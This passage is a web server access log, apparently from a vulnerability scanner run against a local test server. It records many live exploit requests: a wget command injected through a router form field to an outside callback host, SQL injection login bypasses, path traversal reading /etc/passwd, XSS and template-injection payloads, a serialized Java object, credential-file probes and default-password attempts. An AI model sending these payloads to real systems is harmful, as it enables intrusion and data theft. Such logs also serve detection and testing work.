HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.118","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://c9v8hs0smpv8c6ag07h06b64ppb1doh1c.oast.online&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.216","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dc2/admin/auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /opensis/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asynchPeople/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.222","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.230","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/SOAPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MduOL9NNhpip4x6vAr97jbHD/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MduOL9NNhpip4x6vAr97jbHD/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.222","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28297MdkRYY49NXGHP4DcCTzyfX28%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ 